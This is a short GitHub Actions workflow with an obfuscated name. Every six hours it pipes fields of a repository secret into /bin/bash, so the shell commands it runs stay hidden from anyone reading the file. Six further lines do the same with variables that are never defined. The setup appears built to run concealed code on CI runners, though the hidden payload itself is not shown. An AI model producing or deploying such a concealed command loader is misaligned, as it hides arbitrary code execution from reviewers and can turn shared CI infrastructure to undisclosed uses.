name: lvhuaiqing4567

on:
  workflow_dispatch:
  schedule:
    - cron: '19 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lvhuaiqing4567
        env:
          qyr57: ${{ secrets.qyr57 }}
        run: |
          echo $qyr57 | jq -r .fmd96752 | /bin/bash
          echo $t4 | jq -r .esv6 | /bin/bash
          echo $pkz4 | jq -r .sxgx4 | /bin/bash
          echo $jxv5 | jq -r .oxb31656 | /bin/bash
          echo $cqny09331 | jq -r .pcox61581 | /bin/bash
          echo $zgf01 | jq -r .kzjv58 | /bin/bash
          echo $k67019 | jq -r .wdr9 | /bin/bash

